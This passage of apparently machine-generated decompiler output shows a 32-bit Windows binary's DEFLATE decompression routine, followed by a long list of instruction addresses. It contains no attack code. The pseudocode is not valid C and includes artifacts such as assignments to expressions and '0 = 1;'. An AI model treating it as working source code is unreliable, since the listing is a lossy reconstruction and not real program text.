                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                        												__ecx = __ebx;
                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        												__ebx = __ebx + 8;
                        												__eflags = __ebx;
                        											}
                        											L130:
                        											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                        											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                        											__ecx = __eax;
                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        											__ebx = __ebx - __eax;
                        											__eflags = __ebx;
                        											 *__esi = 5;
                        											goto L131;
                        										case 5:
                        											L131:
                        											__eax =  *(__ebp - 0x30);
                        											__edx = __esi[3];
                        											__eax = __eax - __esi;
                        											__ecx = __eax - __esi - 0x1ba0;
                        											__eflags = __eax - __esi - 0x1ba0 - __edx;
                        											if(__eax - __esi - 0x1ba0 >= __edx) {
                        												__ecx = __eax;
                        												__ecx = __eax - __edx;
                        												__eflags = __ecx;
                        											} else {
                        												__esi[0x26e8] = __esi[0x26e8] - __edx;
                        												__ecx = __esi[0x26e8] - __edx - __esi;
                        												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                        											}
                        											__eflags = __esi[1];
                        											 *(__ebp - 0x20) = __ecx;
                        											if(__esi[1] != 0) {
                        												L135:
                        												__edi =  *(__ebp - 0x2c);
                        												do {
                        													L136:
                        													__eflags = __edi;
                        													if(__edi != 0) {
                        														goto L152;
                        													}
                        													L137:
                        													__edi = __esi[0x26e8];
                        													__eflags = __eax - __edi;
                        													if(__eax != __edi) {
                        														L143:
                        														__esi[0x26ea] = __eax;
                        														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                        														__eax = __esi[0x26ea];
                        														__ecx = __esi[0x26e9];
                        														__eflags = __eax - __ecx;
                        														 *(__ebp - 0x30) = __eax;
                        														if(__eax >= __ecx) {
                        															__edi = __esi[0x26e8];
                        															__edi = __esi[0x26e8] - __eax;
                        															__eflags = __edi;
                        														} else {
                        															__ecx = __ecx - __eax;
                        															__edi = __ecx - __eax - 1;
                        														}
                        														__edx = __esi[0x26e8];
                        														__eflags = __eax - __edx;
                        														 *(__ebp - 8) = __edx;
                        														if(__eax == __edx) {
                        															__edx =  &(__esi[0x6e8]);
                        															__eflags = __ecx - __edx;
                        															if(__ecx != __edx) {
                        																__eax = __edx;
                        																__eflags = __eax - __ecx;
                        																 *(__ebp - 0x30) = __eax;
                        																if(__eax >= __ecx) {
                        																	__edi =  *(__ebp - 8);
                        																	__edi =  *(__ebp - 8) - __eax;
                        																	__eflags = __edi;
                        																} else {
                        																	__ecx = __ecx - __eax;
                        																	__edi = __ecx;
                        																}
                        															}
                        														}
                        														__eflags = __edi;
                        														if(__edi == 0) {
                        															goto L183;
                        														} else {
                        															goto L152;
                        														}
                        													}
                        													L138:
                        													__ecx = __esi[0x26e9];
                        													__edx =  &(__esi[0x6e8]);
                        													__eflags = __ecx - __edx;
                        													if(__ecx == __edx) {
                        														goto L143;
                        													}
                        													L139:
                        													__eax = __edx;
                        													__eflags = __eax - __ecx;
                        													if(__eax >= __ecx) {
                        														__edi = __edi - __eax;
                        														__eflags = __edi;
                        													} else {
                        														__ecx = __ecx - __eax;
                        														__edi = __ecx;
                        													}
                        													__eflags = __edi;
                        													if(__edi == 0) {
                        														goto L143;
                        													}
                        													L152:
                        													__ecx =  *(__ebp - 0x20);
                        													 *__eax =  *__ecx;
                        													__eax = __eax + 1;
                        													__ecx = __ecx + 1;
                        													__edi = __edi - 1;
                        													__eflags = __ecx - __esi[0x26e8];
                        													 *(__ebp - 0x30) = __eax;
                        													 *(__ebp - 0x20) = __ecx;
                        													 *(__ebp - 0x2c) = __edi;
                        													if(__ecx == __esi[0x26e8]) {
                        														__ecx =  &(__esi[0x6e8]);
                        														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                        													}
                        													_t357 =  &(__esi[1]);
                        													 *_t357 = __esi[1] - 1;
                        													__eflags =  *_t357;
                        												} while ( *_t357 != 0);
                        											}
                        											goto L23;
                        										case 6:
                        											L156:
                        											__eax =  *(__ebp - 0x2c);
                        											__edi =  *(__ebp - 0x30);
                        											__eflags = __eax;
                        											if(__eax != 0) {
                        												L172:
                        												__cl = __esi[2];
                        												 *__edi = __cl;
                        												__edi = __edi + 1;
                        												__eax = __eax - 1;
                        												 *(__ebp - 0x30) = __edi;
                        												 *(__ebp - 0x2c) = __eax;
                        												goto L23;
                        											}
                        											L157:
                        											__ecx = __esi[0x26e8];
                        											__eflags = __edi - __ecx;
                        											if(__edi != __ecx) {
                        												L163:
                        												__esi[0x26ea] = __edi;
                        												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                        												__edi = __esi[0x26ea];
                        												__ecx = __esi[0x26e9];
                        												__eflags = __edi - __ecx;
                        												 *(__ebp - 0x30) = __edi;
                        												if(__edi >= __ecx) {
                        													__eax = __esi[0x26e8];
                        													__eax = __esi[0x26e8] - __edi;
                        													__eflags = __eax;
                        												} else {
                        													__ecx = __ecx - __edi;
                        													__eax = __ecx - __edi - 1;
                        												}
                        												__edx = __esi[0x26e8];
                        												__eflags = __edi - __edx;
                        												 *(__ebp - 8) = __edx;
                        												if(__edi == __edx) {
                        													__edx =  &(__esi[0x6e8]);
                        													__eflags = __ecx - __edx;
                        													if(__ecx != __edx) {
                        														__edi = __edx;
                        														__eflags = __edi - __ecx;
                        														 *(__ebp - 0x30) = __edi;
                        														if(__edi >= __ecx) {
                        															__eax =  *(__ebp - 8);
                        															__eax =  *(__ebp - 8) - __edi;
                        															__eflags = __eax;
                        														} else {
                        															__ecx = __ecx - __edi;
                        															__eax = __ecx;
                        														}
                        													}
                        												}
                        												__eflags = __eax;
                        												if(__eax == 0) {
                        													goto L183;
                        												} else {
                        													goto L172;
                        												}
                        											}
                        											L158:
                        											__eax = __esi[0x26e9];
                        											__edx =  &(__esi[0x6e8]);
                        											__eflags = __eax - __edx;
                        											if(__eax == __edx) {
                        												goto L163;
                        											}
                        											L159:
                        											__edi = __edx;
                        											__eflags = __edi - __eax;
                        											if(__edi >= __eax) {
                        												__ecx = __ecx - __edi;
                        												__eflags = __ecx;
                        												__eax = __ecx;
                        											} else {
                        												__eax = __eax - __edi;
                        												__eax = __eax - 1;
                        											}
                        											__eflags = __eax;
                        											if(__eax != 0) {
                        												goto L172;
                        											} else {
                        												goto L163;
                        											}
                        										case 7:
                        											L173:
                        											__eflags = __ebx - 7;
                        											if(__ebx > 7) {
                        												__ebx = __ebx - 8;
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                        												_t380 = __ebp - 0x38;
                        												 *_t380 =  *(__ebp - 0x38) - 1;
                        												__eflags =  *_t380;
                        											}
                        											goto L175;
                        										case 8:
                        											L4:
                        											while(_t425 < 3) {
                        												if( *(_t448 - 0x34) == 0) {
                        													goto L182;
                        												} else {
                        													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                        													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                        													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                        													_t425 = _t425 + 8;
                        													continue;
                        												}
                        											}
                        											_t425 = _t425 - 3;
                        											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                        											_t406 =  *(_t448 - 0x40) & 0x00000007;
                        											asm("sbb ecx, ecx");
                        											_t408 = _t406 >> 1;
                        											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                        											if(_t408 == 0) {
                        												L24:
                        												 *_t446 = 9;
                        												_t436 = _t425 & 0x00000007;
                        												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                        												_t425 = _t425 - _t436;
                        												goto L180;
                        											}
                        											L6:
                        											_t411 = _t408 - 1;
                        											if(_t411 == 0) {
                        												L13:
                        												__eflags =  *0x432e90;
                        												if( *0x432e90 != 0) {
                        													L22:
                        													_t412 =  *0x40a5e8; // 0x9
                        													_t446[4] = _t412;
                        													_t413 =  *0x40a5ec; // 0x5
                        													_t446[4] = _t413;
                        													_t414 =  *0x431d0c; // 0x0
                        													_t446[5] = _t414;
                        													_t415 =  *0x431d08; // 0x0
                        													_t446[6] = _t415;
                        													L23:
                        													 *_t446 =  *_t446 & 0x00000000;
                        													goto L180;
                        												} else {
                        													_t26 = _t448 - 8;
                        													 *_t26 =  *(_t448 - 8) & 0x00000000;
                        													__eflags =  *_t26;
                        													_t416 = 0x431d10;
                        													goto L15;
                        													L20:
                        													 *_t416 = _t438;
                        													_t416 = _t416 + 4;
                        													__eflags = _t416 - 0x432190;
                        													if(_t416 < 0x432190) {
                        														L15:
                        														__eflags = _t416 - 0x431f4c;
                        														_t438 = 8;
                        														if(_t416 > 0x431f4c) {
                        															__eflags = _t416 - 0x432110;
                        															if(_t416 >= 0x432110) {
                        																__eflags = _t416 - 0x432170;
                        																if(_t416 < 0x432170) {
                        																	_t438 = 7;
                        																}
                        															} else {
                        																_t438 = 9;
                        															}
                        														}
                        														goto L20;
                        													} else {
                        														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                        														_push(0x1e);
                        														_pop(_t440);
                        														_push(5);
                        														_pop(_t419);
                        														memset(0x431d10, _t419, _t440 << 2);
                        														_t450 = _t450 + 0xc;
                        														_t442 = 0x431d10 + _t440;
                        														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                        														 *0x432e90 =  *0x432e90 + 1;
                        														__eflags =  *0x432e90;
                        														goto L22;
                        													}
                        												}
                        											}
                        											L7:
                        											_t423 = _t411 - 1;
                        											if(_t423 == 0) {
                        												 *_t446 = 0xb;
                        												goto L180;
                        											}
                        											L8:
                        											if(_t423 != 1) {
                        												goto L180;
                        											}
                        											goto L9;
                        										case 9:
                        											while(1) {
                        												L27:
                        												__eflags = __ebx - 0x20;
                        												if(__ebx >= 0x20) {
                        													break;
                        												}
                        												L25:
                        												__eflags =  *(__ebp - 0x34);
                        												if( *(__ebp - 0x34) == 0) {
                        													goto L182;
                        												}
                        												L26:
                        												__eax =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        												__ecx = __ebx;
                        												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        												__ebx = __ebx + 8;
                        												__eflags = __ebx;
                        											}
                        											L28:
                        											__eax =  *(__ebp - 0x40);
                        											__ebx = 0;
                        											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                        											 *(__ebp - 0x40) = 0;
                        											__eflags = __eax;
                        											__esi[1] = __eax;
                        											if(__eax == 0) {
                        												goto L53;
                        											}
                        											L29:
                        											_push(0xa);
                        											_pop(__eax);
                        											goto L54;
                        										case 0xa:
                        											L30:
                        											__eflags =  *(__ebp - 0x34);
                        											if( *(__ebp - 0x34) == 0) {
                        												goto L182;
                        											}
                        											L31:
                        											__eax =  *(__ebp - 0x2c);
                        											__eflags = __eax;
                        											if(__eax != 0) {
                        												L48:
                        												__eflags = __eax -  *(__ebp - 0x34);
                        												if(__eax >=  *(__ebp - 0x34)) {
                        													__eax =  *(__ebp - 0x34);
                        												}
                        												__ecx = __esi[1];
                        												__eflags = __ecx - __eax;
                        												__edi = __ecx;
                        												if(__ecx >= __eax) {
                        													__edi = __eax;
                        												}
                        												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                        												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                        												_t80 =  &(__esi[1]);
                        												 *_t80 = __esi[1] - __edi;
                        												__eflags =  *_t80;
                        												if( *_t80 == 0) {
                        													L53:
                        													__eax = __esi[0x145];
                        													L54:
                        													 *__esi = __eax;
                        												}
                        												goto L180;
                        											}
                        											L32:
                        											__ecx = __esi[0x26e8];
                        											__edx =  *(__ebp - 0x30);
                        											__eflags = __edx - __ecx;
                        											if(__edx != __ecx) {
                        												L38:
                        												__esi[0x26ea] = __edx;
                        												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                        												__edx = __esi[0x26ea];
                        												__ecx = __esi[0x26e9];
                        												__eflags = __edx - __ecx;
                        												 *(__ebp - 0x30) = __edx;
                        												if(__edx >= __ecx) {
                        													__eax = __esi[0x26e8];
                        													__eax = __esi[0x26e8] - __edx;
                        													__eflags = __eax;
                        												} else {
                        													__ecx = __ecx - __edx;
                        													__eax = __ecx - __edx - 1;
                        												}
                        												__edi = __esi[0x26e8];
                        												 *(__ebp - 0x2c) = __eax;
                        												__eflags = __edx - __edi;
                        												if(__edx == __edi) {
                        													__edx =  &(__esi[0x6e8]);
                        													__eflags = __edx - __ecx;
                        													if(__eflags != 0) {
                        														 *(__ebp - 0x30) = __edx;
                        														if(__eflags >= 0) {
                        															__edi = __edi - __edx;
                        															__eflags = __edi;
                        															__eax = __edi;
                        														} else {
                        															__ecx = __ecx - __edx;
                        															__eax = __ecx;
                        														}
                        														 *(__ebp - 0x2c) = __eax;
                        													}
                        												}
                        												__eflags = __eax;
                        												if(__eax == 0) {
                        													goto L183;
                        												} else {
                        													goto L48;
                        												}
                        											}
                        											L33:
                        											__eax = __esi[0x26e9];
                        											__edi =  &(__esi[0x6e8]);
                        											__eflags = __eax - __edi;
                        											if(__eax == __edi) {
                        												goto L38;
                        											}
                        											L34:
                        											__edx = __edi;
                        											__eflags = __edx - __eax;
                        											 *(__ebp - 0x30) = __edx;
                        											if(__edx >= __eax) {
                        												__ecx = __ecx - __edx;
                        												__eflags = __ecx;
                        												__eax = __ecx;
                        											} else {
                        												__eax = __eax - __edx;
                        												__eax = __eax - 1;
                        											}
                        											__eflags = __eax;
                        											 *(__ebp - 0x2c) = __eax;
                        											if(__eax != 0) {
                        												goto L48;
                        											} else {
                        												goto L38;
                        											}
                        										case 0xb:
                        											goto L56;
                        										case 0xc:
                        											L60:
                        											__esi[1] = __esi[1] >> 0xa;
                        											__eax = (__esi[1] >> 0xa) + 4;
                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                        												goto L68;
                        											}
                        											goto L61;
                        										case 0xd:
                        											while(1) {
                        												L93:
                        												__eax = __esi[1];
                        												__ecx = __esi[2];
                        												__edx = __eax;
                        												__eax = __eax & 0x0000001f;
                        												__edx = __edx >> 5;
                        												__eax = __edx + __eax + 0x102;
                        												__eflags = __esi[2] - __eax;
                        												if(__esi[2] >= __eax) {
                        													break;
                        												}
                        												L73:
                        												__eax = __esi[0x143];
                        												while(1) {
                        													L76:
                        													__eflags = __ebx - __eax;
                        													if(__ebx >= __eax) {
                        														break;
                        													}
                        													L74:
                        													__eflags =  *(__ebp - 0x34);
                        													if( *(__ebp - 0x34) == 0) {
                        														goto L182;
                        													}
                        													L75:
                        													__ecx =  *(__ebp - 0x38);
                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                        													__ecx = __ebx;
                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        													__ebx = __ebx + 8;
                        													__eflags = __ebx;
                        												}
                        												L77:
                        												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                        												__eax = __eax &  *(__ebp - 0x40);
                        												__ecx = __esi[0x144];
                        												__eax = __esi[0x144] + __eax * 4;
                        												__edx =  *(__eax + 1) & 0x000000ff;
                        												__eax =  *(__eax + 2) & 0x0000ffff;
                        												__eflags = __eax - 0x10;
                        												 *(__ebp - 0x14) = __eax;
                        												if(__eax >= 0x10) {
                        													L79:
                        													__eflags = __eax - 0x12;
                        													if(__eax != 0x12) {
                        														__eax = __eax + 0xfffffff2;
                        														 *(__ebp - 8) = 3;
                        													} else {
                        														_push(7);
                        														 *(__ebp - 8) = 0xb;
                        														_pop(__eax);
                        													}
                        													while(1) {
                        														L84:
                        														__ecx = __eax + __edx;
                        														__eflags = __ebx - __eax + __edx;
                        														if(__ebx >= __eax + __edx) {
                        															break;
                        														}
                        														L82:
                        														__eflags =  *(__ebp - 0x34);
                        														if( *(__ebp - 0x34) == 0) {
                        															goto L182;
                        														}
                        														L83:
                        														__ecx =  *(__ebp - 0x38);
                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                        														__ecx = __ebx;
                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        														__ebx = __ebx + 8;
                        														__eflags = __ebx;
                        													}
                        													L85:
                        													__ecx = __edx;
                        													__ebx = __ebx - __edx;
                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                        													__edx =  *(__ebp - 8);
                        													__ebx = __ebx - __eax;
                        													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                        													__ecx = __eax;
                        													__eax = __esi[1];
                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        													__ecx = __esi[2];
                        													__eax = __eax >> 5;
                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                        													__eax = __eax & 0x0000001f;
                        													__eax = __edi + __eax + 0x102;
                        													__edi = __edx + __ecx;
                        													__eflags = __edx + __ecx - __eax;
                        													if(__edx + __ecx > __eax) {
                        														goto L9;
                        													}
                        													L86:
                        													__eflags =  *(__ebp - 0x14) - 0x10;
                        													if( *(__ebp - 0x14) != 0x10) {
                        														L89:
                        														__edi = 0;
                        														__eflags = 0;
                        														L90:
                        														__eax = __esi + 0xc + __ecx * 4;
                        														do {
                        															L91:
                        															 *__eax = __edi;
                        															__ecx = __ecx + 1;
                        															__eax = __eax + 4;
                        															__edx = __edx - 1;
                        															__eflags = __edx;
                        														} while (__edx != 0);
                        														__esi[2] = __ecx;
                        														continue;
                        													}
                        													L87:
                        													__eflags = __ecx - 1;
                        													if(__ecx < 1) {
                        														goto L9;
                        													}
                        													L88:
                        													__edi =  *(__esi + 8 + __ecx * 4);
                        													goto L90;
                        												}
                        												L78:
                        												__ecx = __edx;
                        												__ebx = __ebx - __edx;
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        												__ecx = __esi[2];
                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                        												__esi[2] = __esi[2] + 1;
                        											}
                        											L94:
                        											__eax = __esi[1];
                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                        											__edi = __eax;
                        											__eax = __eax >> 5;
                        											__edi = __edi & 0x0000001f;
                        											__ecx = 0x101;
                        											__eax = __eax & 0x0000001f;
                        											__edi = __edi + 0x101;
                        											__eax = __eax + 1;
                        											__edx = __ebp - 0xc;
                        											 *(__ebp - 0x14) = __eax;
                        											 &(__esi[0x148]) = __ebp - 4;
                        											 *(__ebp - 4) = 9;
                        											__ebp - 0x18 =  &(__esi[3]);
                        											 *(__ebp - 0x10) = 6;
                        											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                        											__eflags =  *(__ebp - 4);
                        											if( *(__ebp - 4) == 0) {
                        												__eax = __eax | 0xffffffff;
                        												__eflags = __eax;
                        											}
                        											__eflags = __eax;
                        											if(__eax != 0) {
                        												goto L9;
                        											} else {
                        												L97:
                        												__ebp - 0xc =  &(__esi[0x148]);
                        												__ebp - 0x10 = __ebp - 0x1c;
                        												__eax = __esi + 0xc + __edi * 4;
                        												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                        												__eflags = __eax;
                        												if(__eax != 0) {
                        													goto L9;
                        												}
                        												L98:
                        												__eax =  *(__ebp - 0x10);
                        												__eflags =  *(__ebp - 0x10);
                        												if( *(__ebp - 0x10) != 0) {
                        													L100:
                        													__cl =  *(__ebp - 4);
                        													 *__esi =  *__esi & 0x00000000;
                        													__eflags =  *__esi;
                        													__esi[4] = __al;
                        													__eax =  *(__ebp - 0x18);
                        													__esi[5] =  *(__ebp - 0x18);
                        													__eax =  *(__ebp - 0x1c);
                        													__esi[4] = __cl;
                        													__esi[6] =  *(__ebp - 0x1c);
                        													goto L101;
                        												}
                        												L99:
                        												__eflags = __edi - 0x101;
                        												if(__edi > 0x101) {
                        													goto L9;
                        												}
                        												goto L100;
                        											}
                        										case 0xe:
                        											goto L9;
                        										case 0xf:
                        											L175:
                        											__eax =  *(__ebp - 0x30);
                        											__esi[0x26ea] =  *(__ebp - 0x30);
                        											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                        											__ecx = __esi[0x26ea];
                        											__edx = __esi[0x26e9];
                        											__eflags = __ecx - __edx;
                        											 *(__ebp - 0x30) = __ecx;
                        											if(__ecx >= __edx) {
                        												__eax = __esi[0x26e8];
                        												__eax = __esi[0x26e8] - __ecx;
                        												__eflags = __eax;
                        											} else {
                        												__edx = __edx - __ecx;
                        												__eax = __edx - __ecx - 1;
                        											}
                        											__eflags = __ecx - __edx;
                        											 *(__ebp - 0x2c) = __eax;
                        											if(__ecx != __edx) {
                        												L183:
                        												__edi = 0;
                        												goto L10;
                        											} else {
                        												L179:
                        												__eax = __esi[0x145];
                        												__eflags = __eax - 8;
                        												 *__esi = __eax;
                        												if(__eax != 8) {
                        													L184:
                        													0 = 1;
                        													goto L10;
                        												}
                        												goto L180;
                        											}
                        									}
                        								}
                        								L181:
                        								goto L9;
                        							}
                        							L70:
                        							if( *__edi == __eax) {
                        								goto L72;
                        							}
                        							L71:
                        							__esi[2] = __esi[2] & __eax;
                        							 *__esi = 0xd;
                        							goto L93;
                        						}
                        					}
                        				}
                        				L182:
                        				_t443 = 0;
                        				_t446[0x147] =  *(_t448 - 0x40);
                        				_t446[0x146] = _t425;
                        				( *(_t448 + 8))[1] = 0;
                        				goto L11;
                        			}









                        0x00406d85
                        0x00406d85
                        0x00406d85
                        0x00406d85
                        0x00406d85
                        0x00406d89
                        0x00000000
                        0x00000000
                        0x00406d8f
                        0x00406d8f
                        0x00406d92
                        0x00406d95
                        0x00406d9a
                        0x00406d9c
                        0x00406d9f
                        0x00406da2
                        0x00406da5
                        0x00406da5
                        0x00406da8
                        0x00000000
                        0x00000000
                        0x00406daa
                        0x00406daa
                        0x00406dad
                        0x00406db2
                        0x00406db4
                        0x00406db7
                        0x00406dbd
                        0x00406b1c
                        0x00406b1c
                        0x00406b1f
                        0x00406b25
                        0x00406b2b
                        0x00406b34
                        0x00406b3a
                        0x00406b3d
                        0x00406b44
                        0x00406b49
                        0x00406b4f
                        0x00406b5a
                        0x00406b5a
                        0x00406dc3
                        0x00406dc3
                        0x00406dcd
                        0x00000000
                        0x00000000
                        0x00406dd3
                        0x00406dd3
                        0x00406dd7
                        0x00406dda
                        0x00406dda
                        0x00406dde
                        0x00406de4
                        0x00406de4
                        0x00406de7
                        0x00406dea
                        0x00406df0
                        0x00000000
                        0x00000000
                        0x00406df2
                        0x00406e14
                        0x00406e14
                        0x00406e17
                        0x00000000
                        0x00000000
                        0x00406df4
                        0x00406df8
                        0x00000000
                        0x00000000
                        0x00406dfe
                        0x00406dfe
                        0x00406e01
                        0x00406e04
                        0x00406e09
                        0x00406e0b
                        0x00406e0e
                        0x00406e11
                        0x00406e11
                        0x00406e19
                        0x00406e19
                        0x00406e1f
                        0x00406e22
                        0x00406e25
                        0x00406e25
                        0x00406e2c
                        0x00406e30
                        0x00406e34
                        0x00406e37
                        0x00406e3a
                        0x00406e40
                        0x00406e45
                        0x00000000
                        0x00000000
                        0x00406e47
                        0x00406e5b
                        0x00406e5b
                        0x00406e5f
                        0x00000000
                        0x00000000
                        0x00406e49
                        0x00406e4c
                        0x00406e4c
                        0x00406e53
                        0x00406e58
                        0x00406e58
                        0x00406e58
                        0x00406e61
                        0x00406e61
                        0x00406e64
                        0x00406e72
                        0x00406e78
                        0x00406e7d
                        0x00406e83
                        0x00406e89
                        0x00406e8f
                        0x00406e96
                        0x00406eaa
                        0x00406eaa
                        0x00407479
                        0x00407479
                        0x00407479
                        0x0040747e
                        0x00000000
                        0x00000000
                        0x00406ab6
                        0x00406ab6
                        0x00000000
                        0x004070b1
                        0x004070b1
                        0x004070b5
                        0x004070b8
                        0x004070bb
                        0x004070be
                        0x00000000
                        0x00000000
                        0x004070c4
                        0x004070c4
                        0x004070e9
                        0x004070e9
                        0x004070e9
                        0x004070eb
                        0x00000000
                        0x00000000
                        0x004070c9
                        0x004070c9
                        0x004070cd
                        0x00000000
                        0x00000000
                        0x004070d3
                        0x004070d3
                        0x004070d6
                        0x004070d9
                        0x004070dc
                        0x004070de
                        0x004070e0
                        0x004070e3
                        0x004070e6
                        0x004070e6
                        0x004070e6
                        0x004070ed
                        0x004070ed
                        0x004070f5
                        0x004070f8
                        0x004070fb
                        0x004070fe
                        0x00407102
                        0x00407105
                        0x00407107
                        0x0040710a
                        0x0040710c
                        0x00407120
                        0x00407120
                        0x00407123
                        0x0040713d
                        0x0040713d
                        0x00407140
                        0x00000000
                        0x00000000
                        0x00407146
                        0x00407146
                        0x00407149
                        0x00000000
                        0x00000000
                        0x0040714f
                        0x0040714f
                        0x00000000
                        0x0040714f
                        0x00407125
                        0x00407128
                        0x0040712f
                        0x00407132
                        0x00000000
                        0x00407132
                        0x0040710e
                        0x00407112
                        0x00407115
                        0x00000000
                        0x00000000
                        0x0040715a
                        0x0040715a
                        0x0040717f
                        0x0040717f
                        0x0040717f
                        0x00407181
                        0x00000000
                        0x00000000
                        0x0040715f
                        0x0040715f
                        0x00407163
                        0x00000000
                        0x00000000
                        0x00407169
                        0x00407169
                        0x0040716c
                        0x0040716f
                        0x00407172
                        0x00407174
                        0x00407176
                        0x00407179
                        0x0040717c
                        0x0040717c
                        0x0040717c
                        0x00407183
                        0x0040718b
                        0x0040718e
                        0x00407191
                        0x00407193
                        0x00407196
                        0x00407196
                        0x00407198
                        0x0040719c
                        0x0040719f
                        0x004071a2
                        0x004071a5
                        0x00000000
                        0x00000000
                        0x004071ab
                        0x004071ab
                        0x004071d0
                        0x004071d0
                        0x004071d0
                        0x004071d2
                        0x00000000
                        0x00000000
                        0x004071b0
                        0x004071b0
                        0x004071b4
                        0x00000000
                        0x00000000
                        0x004071ba
                        0x004071ba
                        0x004071bd
                        0x004071c0
                        0x004071c3
                        0x004071c5
                        0x004071c7
                        0x004071ca
                        0x004071cd
                        0x004071cd
                        0x004071cd
                        0x004071d4
                        0x004071d4
                        0x004071dc
                        0x004071df
                        0x004071e2
                        0x004071e5
                        0x004071e9
                        0x004071ec
                        0x004071ee
                        0x004071f1
                        0x004071f4
                        0x0040720e
                        0x0040720e
                        0x00407211
                        0x00000000
                        0x00000000
                        0x00407217
                        0x00407217
                        0x0040721a
                        0x00407221
                        0x00000000
                        0x00407221
                        0x004071f6
                        0x004071f9
                        0x00407200
                        0x00407203
                        0x00000000
                        0x00000000
                        0x00407229
                        0x00407229
                        0x0040724e
                        0x0040724e
                        0x0040724e
                        0x00407250
                        0x00000000
                        0x00000000
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x00000000
                        0x00000000
                        0x00407238
                        0x00407238
                        0x0040723b
                        0x0040723e
                        0x00407241
                        0x00407243
                        0x00407245
                        0x00407248
                        0x0040724b
                        0x0040724b
                        0x0040724b
                        0x00407252
                        0x0040725a
                        0x0040725d
                        0x00407260
                        0x00407262
                        0x00407265
                        0x00407265
                        0x00407267
                        0x00000000
                        0x00000000
                        0x0040726d
                        0x0040726d
                        0x00407270
                        0x00407275
                        0x00407277
                        0x0040727d
                        0x0040727f
                        0x00407294
                        0x00407296
                        0x00407296
                        0x00407281
                        0x00407287
                        0x00407289
                        0x0040728b
                        0x0040728b
                        0x00407298
                        0x0040729c
                        0x0040729f
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x004072a8
                        0x004072a8
                        0x004072aa
                        0x00000000
                        0x00000000
                        0x004072b0
                        0x004072b0
                        0x004072b6
                        0x004072b8
                        0x004072dd
                        0x004072e0
                        0x004072e6
                        0x004072eb
                        0x004072f1
